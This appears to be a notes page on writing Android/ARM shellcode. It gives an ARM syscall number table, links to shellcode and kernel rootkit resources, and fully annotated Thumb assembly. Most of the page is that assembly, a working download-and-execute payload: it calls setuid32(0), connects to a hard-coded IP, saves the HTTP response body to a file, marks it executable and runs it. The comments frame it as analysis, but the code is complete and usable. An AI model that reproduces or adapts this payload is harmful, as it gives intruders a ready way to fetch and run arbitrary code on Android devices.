Write some note here.

System call table (ARM, as used by the example below):

1 exit
2 fork
3 read
4 write
5 open
6 close
9 link
10 unlink
11 execve
12 chdir
14 mknod
15 chmod
19 lseek
20 getpid
21 mount
26 ptrace
29 pause
33 access
36 sync
38 rename
39 mkdir
40 rmdir
41 dup
42 pipe
43 times
45 brk
51 acct
52 umount2
54 ioctl
55 fcntl
57 setpgid
60 umask
61 chroot
63 dup2
64 getppid
66 setsid
67 sigaction
72 sigsuspend
73 sigpending
75 setrlimit
77 getrusage
78 gettimeofday
79 settimeofday
83 symlink
85 readlink
88 reboot
91 munmap
92 truncate
93 ftruncate
94 fchmod
96 getpriority
97 setpriority
103 syslog
104 setitimer
105 getitimer
114 wait4
116 sysinfo
118 fsync
120 clone
122 uname
125 mprotect
126 sigprocmask
128 init_module
129 delete_module
132 getpgid
133 fchdir
140 _llseek
142 _newselect
143 flock
144 msync
145 readv
146 writev
148 fdatasync
150 mlock
151 munlock
154 sched_setparam
155 sched_getparam
156 sched_setscheduler
157 sched_getscheduler
158 sched_yield
159 sched_get_priority_max
160 sched_get_priority_min
161 sched_rr_get_interval
162 nanosleep
163 mremap
168 poll
172 prctl
174 rt_sigaction
175 rt_sigprocmask
177 rt_sigtimedwait
180 pread64
181 pwrite64
183 getcwd
184 capget
185 capset
186 sigaltstack
187 sendfile
190 vfork
191 ugetrlimit
192 mmap2
195 stat64
196 lstat64
197 fstat64
198 lchown32
199 getuid32
200 getgid32
201 geteuid32
202 getegid32
203 setreuid32
204 setregid32
205 getgroups32
206 setgroups32
207 fchown32
208 setresuid32
209 getresuid32
210 setresgid32
211 getresgid32
212 chown32
213 setuid32
214 setgid32
217 getdents64
219 mincore
220 madvise
221 fcntl64
224 gettid
240 futex
248 exit_group
250 epoll_create
251 epoll_ctl
252 epoll_wait
257 timer_create
258 timer_settime
259 timer_gettime
260 timer_getoverrun
261 timer_delete
262 clock_settime
263 clock_gettime
264 clock_getres
265 clock_nanosleep
266 statfs64
267 fstatfs64
269 utimes
280 waitid
281 socket
282 bind
283 connect
284 listen
285 accept
286 getsockname
287 getpeername
288 socketpair
290 sendto
292 recvfrom
293 shutdown
294 setsockopt
295 getsockopt
296 sendmsg
297 recvmsg
314 ioprio_set
315 ioprio_get
316 inotify_init
317 inotify_add_watch
318 inotify_rm_watch
322 openat
323 mkdirat
325 fchownat
327 fstatat64
328 unlinkat
329 renameat
333 fchmodat
356 eventfd2
359 pipe2
983042 ARM_cacheflush
983045 ARM_set_tls

The Linux system call table API reference:

http://syscalls.kernelgrok.com/

Writing shellcode on Android/ARM, with a note on how to pass the arguments, perform the call and get the result:

http://bbs.pediy.com/showthread.php?t=155774

An example copied from there:

@ GNU as, 32-bit ARM, Linux/Android EABI. Syscall convention used throughout:
@ number in r7, arguments in r0-r2, `swi #0`, result back in r0.
@
@ Analysis summary (what the sample does, in syscall order):
@   setuid32(0) -> open(name, O_CREAT|O_WRONLY|O_TRUNC, 0700) -> socket -> connect
@   -> write(sock, head) -> read loop until "\r\n\r\n" -> write(fd, body) loop
@   -> close(sock) -> close(fd) -> chmod(name, 0700) -> execve(name, {name, NULL}, NULL) -> exit(0)
@ i.e. a plain-HTTP downloader that stores the response body in the file `name`,
@ marks it executable and runs it. The syscall numbers used (213, 5, 281, 283, 4, 3,
@ 6, 15, 11, 1) match the ARM table above.
@
@ Register roles: r4 = fd of the output file, r5 = socket, r6 = header-terminator
@ pattern, r3 = rolling 4-byte window of received bytes, r7 = syscall number.
@ Analysis/detection notes: destination address (`addr`), HTTP request (`head`) and
@ output filename (`name`) are inline plaintext data; no return value is checked, so a
@ failed open/socket/connect does not stop the sequence.
.globl _start
.align 2
_start:
.code 32                      @ entered in ARM state
  adr r0, thumb + 1           @ low bit set: bx switches to Thumb state
  bx r0
thumb:
.code 16                      @ everything below is Thumb (16-bit) encoding
  mov r0, #0
  mov r7, #213
  swi #0 @setuid32(0)
  @ create the output file
  mov r2, #0x1C
  lsl r2, #4 @S_IRWXU (0x1C0 = 0700)
  mov r1, #0x24
  lsl r1, #4
  add r1, r1, #1 @O_CREAT|O_WRONLY|O_TRUNC (0x241)
  adr r0, name
  mov r7, #5
  swi #0 @int fd = open(name, O_CREAT|O_WRONLY|O_TRUNC, S_IRWXU)
  mov r4, r0                  @ r4 = fd; not checked, a negative value is used as-is
  mov r2, #6 @IPPROTO_TCP
  mov r1, #1 @SOCK_STREAM
  mov r0, #2 @AF_INET
  mov r7, #250
  add r7, #31                 @ r7 = 281 (socket); built in two steps because the Thumb mov immediate is 8 bits
  @ establish the connection
  swi #0 @int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
  mov r5, r0                  @ r5 = sock; not checked
  mov r2, #16                 @ sizeof(struct sockaddr_in), matches the 16 bytes at addr
  adr r1, addr
  mov r7, #250
  add r7, #33                 @ r7 = 283 (connect)
  swi #0 @connect(sock, addr, 16)
  @ compute the HTTP header length: strlen(head), r1 = start, r2 scans to the NUL
  adr r2, head
  mov r1, r2
  b L1
L0:
  add r2, r2, #1
L1:
  ldrb r0, [r2]
  cmp r0, #0
  bne L0
  sub r2, r2, r1              @ r2 = strlen(head)
  mov r0, r5
  mov r7, #4
  swi #0 @write(sock, head, strlen(head))
  @ skip the HTTP response header
  mov r3, #0                  @ r3 = rolling window of the last 4 bytes seen
  adr r6, nrnr
  ldr r6, [r6]                @ r6 = 4 bytes at nrnr as a little-endian word (0x0D0A0D0A)
L2:
  mov r2, #252
  sub sp, sp, #252            @ 252-byte receive buffer on the stack; released before each new read
  mov r1, sp
  mov r0, r5
  mov r7, #3
  push {r3}                   @ preserve the rolling window across the syscall
  swi #0 @int len = read(sock, buf, 252)
  pop {r3}
  cmp r0, #0
  ble L7                      @ EOF or error (signed compare): stop receiving
  mov r2, #0                  @ r2 = index into this chunk
L3:
  lsl r3, r3, #8              @ window built big-endian: shift in each received byte
  mov r1, sp
  add r1, r2
  ldrb r1, [r1]
  add r3, r3, r1
  add r2, r2, #1
  cmp r3, r6                  @ big-endian window vs little-endian constant => matches "\r\n\r\n" (end of header)
  beq L4
  cmp r2, r0                  @ whole chunk scanned without a match?
  bne L3
  add sp, sp, #252            @ release buffer, read the next chunk
  b L2
L4:
  mov r1, sp
  add r1, r2                  @ r1 = first body byte (just after the terminator)
  sub r2, r0, r2              @ r2 = body bytes remaining in this chunk
  b L6
  @ write to the file
L5:
  mov r2, #252
  sub sp, sp, #252
  mov r1, sp
  mov r0, r5
  mov r7, #3
  swi #0 @int len = read(sock, buf, 252)
  cmp r0, #0
  ble L7                      @ EOF or error: finish
  mov r2, r0                  @ r2 = len; whole chunk is body now
  mov r1, sp
L6:
  mov r0, r4
  mov r7, #4
  swi #0 @write(fd, buf, len)
  add sp, sp, #252            @ release buffer
  b L5
L7:
  add sp, sp, #252            @ release the buffer allocated by the read that failed/hit EOF
  mov r0, r5
  mov r7, #6
  swi #0 @close(sock)
  mov r0, r4
  swi #0 @close(fd)           @ r7 still holds 6 (close)
  @ execute the file
  mov r1, #0x1C
  lsl r1, #4 @S_IRUSR|S_IWUSR|S_IXUSR (0x1C0, same value as S_IRWXU above)
  adr r0, name
  mov r7, #15
  swi #0 @chmod(name, S_IRUSR|S_IWUSR|S_IXUSR)
  mov r2, #0                  @ envp = NULL
  mov r1, #0
  push {r1}                   @ argv[1] = NULL
  adr r0, name
  push {r0} @argv[0]
  mov r1, sp @argv            @ argv = {name, NULL} built on the stack
  mov r7, #11
  swi #0 @execve(name, argv, NULL)
  mov r0, #0                  @ only reached if execve failed
  mov r7, #1
  swi #0 @exit(0)
addr:                         @ struct sockaddr_in, 16 bytes
  .short 2 @AF_INET
  .ascii "\x00\x50" @port     (network byte order, 0x0050 = 80)
  .byte 202, 120, 2, 102 @ip
  .zero 8                     @ sin_zero
head:                         @ NUL-terminated HTTP request; length computed at run time above
  .ascii "GET /"
  .ascii "" @file             (empty placeholder: the request path is just "/")
  .ascii " HTTP/1.1\r\n"
  .ascii "HOST: "
  .ascii "www.android.com" @host
  .ascii "\r\n\r\n\x00"
  .zero 2
name:                         @ output filename passed to open/chmod/execve
  .asciz "xxx"
nrnr:                         @ header-terminator pattern; loaded little-endian into r6 above
  .ascii "\n\r\n\r"

Here is how to get the system call table:

https://viaforensics.com/mobile-security/syscalltable-android-playing-rootkits.html

And a perfect Android kernel rootkit paper here:

http://www.phrack.org/issues/68/6.html

 

Code references:

x86: https://android.googlesource.com/kernel/common.git/+/android-3.10/arch/x86/kernel/entry_32.S

x64: https://android.googlesource.com/kernel/common.git/+/android-3.10/arch/x86/kernel/entry_64.S

arm: https://android.googlesource.com/kernel/common.git/+/android-3.10/arch/arm/kernel/entry-common.S